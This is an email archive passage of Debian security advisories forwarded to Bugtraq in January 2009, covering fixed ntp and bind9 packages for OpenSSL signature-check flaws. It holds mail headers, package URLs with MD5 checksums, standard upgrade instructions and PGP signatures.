  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_sparc.deb
    Size/MD5 checksum:  2124310 91c54b669eae9e38ae65486d5f082c6b
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_sparc.deb
    Size/MD5 checksum:  3418866 a6805a9c7125b04e0c226b2a90c9d5d2
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_sparc.deb
    Size/MD5 checksum:  1801340 af40fbabcf27d1c8a81d18f3e3d4ac4d
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_sparc.deb
    Size/MD5 checksum:  2113338 c5e7dd09e9c4133e9a06a286ace5b7ed
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_sparc.deb
    Size/MD5 checksum:  1020946 713c98cac975ec8c0c64c96812353f82
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_sparc.deb
    Size/MD5 checksum:  4089498 b1c0f345c3d51a9dea6dd07a003e6e4e


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJJa6HkAAoJEL97/wQC1SS+dUoIAIgbRbI+KFz78+o576VGENxO
wNUutfUiutwNWzwzZem6flZolGIbSzOl7N89Sf1CQ1/TH3KxSrTTmjIi9T11A1iM
U85uv7VFaSaLCwKjQli1bfErrFyXLLs3S2WvXDLxRRy1YEdJw45sI49R068wilzy
XWq2x9bOvJeLSK9IyNorFkt9MI/ZWuFvHY+uQxUTqiF4rd4IU/1hZpMhG0L5KKO5
Rnz9KkbaRIc4z2wO7fgnTIG0ML5VUSdEWdrosmygkbqKTqfwzInVqpY9sj4R9T/1
2tsRWeXSU6JEFxDQhyn5VitYu5Cmo1rvzFVg/Ea6Wi0iAzWMD5D0ICKFbOc/I4s=7mYv
-----END PGP SIGNATURE-----

From - Mon Jan 12 17:22:16 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005899
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39140-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 5DA30ECE0D
for <lists@securityspace.com>; Mon, 12 Jan 2009 17:19:36 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 20A5A1437D0; Mon, 12 Jan 2009 14:16:37 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 4428 invoked from network); 12 Jan 2009 20:11:08 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <fw@deneb.enyo.de>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight: using cached result; rate: -4.6
From: Florian Weimer <fw@deneb.enyo.de>
Date: Mon, 12 Jan 2009 21:34:15 +0100
Message-ID: <87y6xgxnzs.fsf@mid.deneb.enyo.de>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-9.58 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_1=1, IMPRONONCABLE_2=1, LDO_WHITELIST=-5,
MURPHY_WRONG_WORD1=0.1, MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1702-1] New ntp packages fix cryptographic weakness
Priority: urgent
Resent-Message-ID: <C_2JWMzNn6N.A.F2D.bl6aJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Mon, 12 Jan 2009 20:34:35 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1702-1                  security@debian.org
http://www.debian.org/security/                           Florian Weimer
January 12, 2009                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : ntp
Vulnerability  : interpretation conflict
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2009-0021
Debian Bug     : 511227

It has been discovered that NTP, an implementation of the Network Time
Protocol, does not properly check the result of an OpenSSL function
for verifying cryptographic signatures, which may ultimately lead to
the acceptance of unauthenticated time information.  (Note that
cryptographic authentication of time servers is often not enabled in
the first place.)

For the stable distribution (etch), this problem has been fixed in
version 4.2.2.p4+dfsg-2etch1.

For the unstable distribution (sid), this problem has been fixed in
version 4.2.4p4+dfsg-8.

The testing distribution (lenny) will be fixed soon.

We recommend that you upgrade your ntp package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch1.dsc
    Size/MD5 checksum:      906 e0ae8fa9aad8606ad51a06511159c27d
  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg.orig.tar.gz
    Size/MD5 checksum:  2199764 ad746cda2d90dbb9ed06fe164273c5d0
  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch1.diff.gz
    Size/MD5 checksum:   176270 339515bd8d7e653a9fedb2bcad03bb74

Architecture independent packages:

  http://security.debian.org/pool/updates/main/n/ntp/ntp-doc_4.2.2.p4+dfsg-2etch1_all.deb
    Size/MD5 checksum:   910396 fc7d395c11365e371d58da5ab0d34bba
  http://security.debian.org/pool/updates/main/n/ntp/ntp-simple_4.2.2.p4+dfsg-2etch1_all.deb
    Size/MD5 checksum:    28380 4b4c4955ecd354a4bc884027786c368f
  http://security.debian.org/pool/updates/main/n/ntp/ntp-refclock_4.2.2.p4+dfsg-2etch1_all.deb
    Size/MD5 checksum:    28382 31adec52e5d82d9d3026a41b37dc6936

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch1_alpha.deb
    Size/MD5 checksum:    64790 9f577a186d01ad00e9882cd3424d2cac
  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch1_alpha.deb
    Size/MD5 checksum:   407826 3e07d1ea475302dd39019d1bdc982ce7

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch1_amd64.deb
    Size/MD5 checksum:    61274 0aedd7774998dfb1641860d66821af35
  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch1_amd64.deb
    Size/MD5 checksum:   359176 a0e6375e933a8e591f34122fdf8b2bb0

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch1_hppa.deb
    Size/MD5 checksum:    61736 9230c434db7c6b89c8ca032262653d91
  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch1_hppa.deb
    Size/MD5 checksum:   373162 36909f95cddcfda62096aa9052441189

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch1_i386.deb
    Size/MD5 checksum:   328564 91103db311d21a9da3fa7fbd3c3d076a
  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch1_i386.deb
    Size/MD5 checksum:    57832 fc544d64adaac58dde6aef81a18a70fa

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch1_ia64.deb
    Size/MD5 checksum:    74470 19e2e2b4124a7ca1a82e43a29b3b99b5
  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch1_ia64.deb
    Size/MD5 checksum:   523072 9b004e17c3541978ee1abdf2e02494bb

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch1_mipsel.deb
    Size/MD5 checksum:   389912 45526855df18c76e2eb826983c3d450f
  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch1_mipsel.deb
    Size/MD5 checksum:    63888 5bbabab2a3c5571b3c2fd82a80bb5582

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch1_powerpc.deb
    Size/MD5 checksum:   358632 187ec033929b189b6cd3dcb3f9377fbf
  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch1_powerpc.deb
    Size/MD5 checksum:    61452 3e0560060aee1113105db444eddad1be

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch1_s390.deb
    Size/MD5 checksum:    60998 2dd5ba10abba0a55e5f22c76b67460fb
  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch1_s390.deb
    Size/MD5 checksum:   349954 adeac4a7f39c3a2e945cfaf76e8159dc

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch1_sparc.deb
    Size/MD5 checksum:   331972 a56d5e21ed84396f7439d7d49a5884ab
  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch1_sparc.deb
    Size/MD5 checksum:    58316 78936a99f622964adb9f08f1739f77c9


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJJa6iSAAoJEL97/wQC1SS+EtYH/31LUTH27dQlayvZAAuBC5HK
NVdKUIjUWtU7uWVFipPNyr/eETH4pQ1tklSC1bYsi4poeXLnvjaqYIbAI0PQGNPK
5B7R4Kb5LgRNJcVz0aCdKeMgtOUO6l1H7A9TELANLg0kX+BZPCKXdRrlHCZmOQuQ
S7gN0Q+BCxcpdAfgQjzGEDPHLDMIwEazjUDaXDwIX+tU1vr0zr2GFsJDT2aGhlpx
4XAVhfcC3GBu6/wLR6h5Lcnu3/p30sjT8IRGAC9+q+VFZXyla5lLAqntQSVUWs91
IXBpmGa65AoU34mAx/AHhVzzcSINp+Dttk9hD02oQKvjcRnU9fFFbF1rZVVPbDc=XPnW
-----END PGP SIGNATURE-----

From - Mon Jan 12 17:32:16 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000589a
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39141-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id E3E05ECE08
for <lists@securityspace.com>; Mon, 12 Jan 2009 17:31:43 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 7129F236FA6; Mon, 12 Jan 2009 15:14:10 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 5868 invoked from network); 12 Jan 2009 21:04:08 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <fw@deneb.enyo.de>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight: using cached result; rate: -4.6
From: Florian Weimer <fw@deneb.enyo.de>
Date: Mon, 12 Jan 2009 22:27:18 +0100
Message-ID: <87tz84useh.fsf@mid.deneb.enyo.de>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-9.08 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_2=1, LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1,
MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5, PHONENUMBER=1.5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1703-1] New bind9 packages fix cryptographic weakness
Priority: urgent
Resent-Message-ID: <3QWbcQhpqNG.A.q5B.GX7aJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Mon, 12 Jan 2009 21:27:34 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1703-1                  security@debian.org
http://www.debian.org/security/                           Florian Weimer
January 12, 2009                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : bind9
Vulnerability  : interpretation conflict
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2009-0025

It was discovered that BIND, an implementation of the DNS protocol
suite, does not properly check the result of an OpenSSL function which
is used to verify DSA cryptographic signatures.  As a result,
incorrect DNS resource records in zones protected by DNSSEC could be
accepted as genuine.

For the stable distribution (etch), this problem has been fixed in
version 9.3.4-2etch4.

For the unstable distribution (sid) and the testing distribution
(lenny), this problem will be fixed soon.

We recommend that you upgrade your BIND packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch4.dsc
    Size/MD5 checksum:     1197 aa679c6e3106b422fa8de952556cc98e
  http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch4.diff.gz
    Size/MD5 checksum:   302859 12d089f391d6ac1a60e2a7b7b8c49f42
  http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4.orig.tar.gz
    Size/MD5 checksum:  4043577 198181d47c58a0a9c0265862cd5557b0

Architecture independent packages:

  http://security.debian.org/pool/updates/main/b/bind9/bind9-doc_9.3.4-2etch4_all.deb
    Size/MD5 checksum:   187564 d3609a90363331288018fcdbba29a047

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch4_alpha.deb
    Size/MD5 checksum:   226154 9adec25147fa3f2c85cef36c75148335
  http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch4_alpha.deb
    Size/MD5 checksum:    96576 8ca632cac9163decf3c3dd24a373cc1b
  http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch4_alpha.deb
    Size/MD5 checksum:   112678 273ba2508722416d3a7090153922c01e
  http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch4_alpha.deb
    Size/MD5 checksum:    98226 eef74b1024e184fcea8a09f3800cf544
  http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch4_alpha.deb
    Size/MD5 checksum:   190164 7eac73aae4fabfcfec8e9ecdcde45ff5
  http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch4_alpha.deb
    Size/MD5 checksum:   322348 a5a5ea6ddbfaab6c8aeaf247d1c95874
  http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch4_alpha.deb
    Size/MD5 checksum:   116594 61d56b68f75ef2693169176efa07512e
  http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch4_alpha.deb
    Size/MD5 checksum:   564948 2827fe2266733bd0439ec8a22f167f25
  http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch4_alpha.deb
    Size/MD5 checksum:   115860 0bb76803abf4d4799c7d2a64cd0af449
  http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch4_alpha.deb
    Size/MD5 checksum:  1407512 95c550a74d02dbe81886f33499e249cc
  http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch4_alpha.deb
    Size/MD5 checksum:   188806 420104ba72fe220ae0e7eff269fc086d

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch4_amd64.deb
    Size/MD5 checksum:   317636 d5841784354f118901f08f48a0e886e8
  http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch4_amd64.deb
    Size/MD5 checksum:    96156 ce4d2168a261c296f6b60dc2c52a0ac0
  http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch4_amd64.deb
    Size/MD5 checksum:   224438 460704b96b0b279f5f54346a02356f18
  http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch4_amd64.deb
    Size/MD5 checksum:   190758 21f6b7f6dca59161cf1ba423b97a013e
  http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch4_amd64.deb
    Size/MD5 checksum:   552562 4cdcf10ca2572737e63c6269e4d7ef6b
  http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch4_amd64.deb
    Size/MD5 checksum:   117040 24dd657bb0b671a48fb1498948fdca41
  http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch4_amd64.deb
    Size/MD5 checksum:   114878 02b9e3b075f638e91b92248e40f46cea
  http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch4_amd64.deb
    Size/MD5 checksum:  1107812 587e9613589665f4ccecac2d1bb7c4e7
  http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch4_amd64.deb
    Size/MD5 checksum:   187666 e359081c8f81d6380655bc563a844803
  http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch4_amd64.deb
    Size/MD5 checksum:    96942 07f2b24d6f2815bb4fcad64a206d21b2
  http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch4_amd64.deb
    Size/MD5 checksum:   111304 f85b9997f97e24dd1c972a6c25d3713f

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch4_arm.deb
    Size/MD5 checksum:    95824 cd0dbfd76dc1a9a7ae66c3d17dd2c076
  http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch4_arm.deb
    Size/MD5 checksum:   187430 4d066c4c8fda96616654f0e5c5f269d4
  http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch4_arm.deb
    Size/MD5 checksum:   532276 f15132b68c23e3a2b7bcbb1d0c7e9e1c
  http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch4_arm.deb
    Size/MD5 checksum:   116148 821abd04e8459db5bd026dce7c5007c8
  http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch4_arm.deb
    Size/MD5 checksum:   112778 b0737de9602f9844b17f8c79c0c7bee9
  http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch4_arm.deb
    Size/MD5 checksum:   107920 93094487c134673000797d03326bcfbb
  http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch4_arm.deb
    Size/MD5 checksum:   183016 668007a69bc0bcb174fb3af007a06a2d
  http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch4_arm.deb
    Size/MD5 checksum:   217782 fe30c568a6f694e31f323c5a7c65a489
  http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch4_arm.deb
    Size/MD5 checksum:   311142 a5ad717d9c53e22fc559e2b846af6761
  http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch4_arm.deb
    Size/MD5 checksum:    95240 bec7ba6d11e71d4a5203ffd8775ce61b
  http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch4_arm.deb
    Size/MD5 checksum:  1074544 a8d33e799364caf2a1a6119ba980fb5c

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch4_hppa.deb
    Size/MD5 checksum:    96486 780b5f6edcb2594c074faaacac84a506
  http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch4_hppa.deb
    Size/MD5 checksum:   217580 f4eb031a7c5a6c4454d84cd784c218aa
  http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch4_hppa.deb
    Size/MD5 checksum:   188274 b8428b8e5c42e5f809d9180196435023
  http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch4_hppa.deb
    Size/MD5 checksum:   115708 144ebf381de71a09bca8bd0dd0899969
  http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch4_hppa.deb
    Size/MD5 checksum:  1258938 60e891b0432a731536a921964a5ba3e7
  http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch4_hppa.deb
    Size/MD5 checksum:   185524 291fd0feff440c39dcdfa77b19fb70dd
  http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch4_hppa.deb
    Size/MD5 checksum:   314068 441b640e2d300524bf352d613833afdf
  http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch4_hppa.deb
    Size/MD5 checksum:   543334 89560b776cd247e6dfbc37b5a8ad541d
  http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch4_hppa.deb
    Size/MD5 checksum:   114236 452ab3e612e68e21df601d3a1f3016bc
  http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch4_hppa.deb
    Size/MD5 checksum:    96668 749a3664788afdf253d40123630c913d
  http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch4_hppa.deb
    Size/MD5 checksum:   113042 c77ab83bf8b702a0f221299f63f84275

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch4_i386.deb
    Size/MD5 checksum:   110234 cb2d13c313d5061d6af864325b9b7d0d
  http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch4_i386.deb
    Size/MD5 checksum:    95040 b8d8c02291c6fa58cfc6405902c39ba0
  http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch4_i386.deb
    Size/MD5 checksum:   206548 05f6acbfc0982ed87a378e35f3ad8be9
  http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch4_i386.deb
    Size/MD5 checksum:   472778 22d8b1ea77e191686c5affab4c869240
  http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch4_i386.deb
    Size/MD5 checksum:   296242 86357a0f5353674fb5b73ddf97d8a242
  http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch4_i386.deb
    Size/MD5 checksum:   170214 163fdc7612a950d7a32b0992af767b23
  http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch4_i386.deb
    Size/MD5 checksum:   995236 a747c1d27a79515936517d301a534e07
  http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch4_i386.deb
    Size/MD5 checksum:   180794 4bc0c43e3454131453454d08d6029de4
  http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch4_i386.deb
    Size/MD5 checksum:    95042 7656f21f85e5489d595a5fc43627199b
  http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch4_i386.deb
    Size/MD5 checksum:   106106 6b5985e30d0536eb56dfd5b31b479b58
  http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch4_i386.deb
    Size/MD5 checksum:   113194 3ae945c6b46bda56b407e81bf285fad6

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch4_ia64.deb
    Size/MD5 checksum:   117816 c06945e1506470a93158549c6e94ec80
  http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch4_ia64.deb
    Size/MD5 checksum:   102474 4cd35b5a1cfb24b1fb156441fae565e9
  http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch4_ia64.deb
    Size/MD5 checksum:  1584324 7e7b49e71bde1abc7fec8a6845b4e376
  http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch4_ia64.deb
    Size/MD5 checksum:   216428 682aa4769f46a7dfb2b2bdaf7ec53dde
  http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch4_ia64.deb
    Size/MD5 checksum:   127650 7206fa330fc8b115a95f8a20073b2683
  http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch4_ia64.deb
    Size/MD5 checksum:   232106 e8a5ae82b88f1288ee91fb6879a38035
  http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch4_ia64.deb
    Size/MD5 checksum:   393396 f6d1ec1bdd9b7d3bf0543c1f72184c5e
  http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch4_ia64.deb
    Size/MD5 checksum:   100022 b080abf8bcf2f7d33944c0f5ab07d5db
  http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch4_ia64.deb
    Size/MD5 checksum:   740278 684ee73762dc6a569e0ad5458cb39a63
  http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch4_ia64.deb
    Size/MD5 checksum:   280944 434b3f2bf7b6eac8c8eadbc9ff71b88a
  http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch4_ia64.deb
    Size/MD5 checksum:   125878 78c533671d65799444a6abeecb066102

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch4_mips.deb
    Size/MD5 checksum:    95048 1a1adcb72a4a988eb862dbfa70a05993
  http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch4_mips.deb
    Size/MD5 checksum:    94272 494f78dca4285c9784f92779d08516a0
  http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch4_mips.deb
    Size/MD5 checksum:   180574 d4bace2add3362896bdb17e794642d80
  http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch4_mips.deb
    Size/MD5 checksum:   211456 a317473e059e7670b6bb603a1fb532b2
  http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch4_mips.deb
    Size/MD5 checksum:   107968 9d86c2744569db8b9110c37be4de8aba
  http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch4_mips.deb
    Size/MD5 checksum:   110378 ab471c9ce1bb5a666413d00253c84c71
  http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch4_mips.deb
    Size/MD5 checksum:   491896 984d83789bb28f65d78130b5ffe58783
  http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch4_mips.deb
    Size/MD5 checksum:  1229560 6bae9ceb7a1a604f3a45c6df905fb2c8
  http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch4_mips.deb
    Size/MD5 checksum:   301540 084df4d5378ecb47eee2715a709005ef
  http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch4_mips.deb
    Size/MD5 checksum:   174080 29e62329993fe21bd2d412b659a3c220
  http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch4_mips.deb
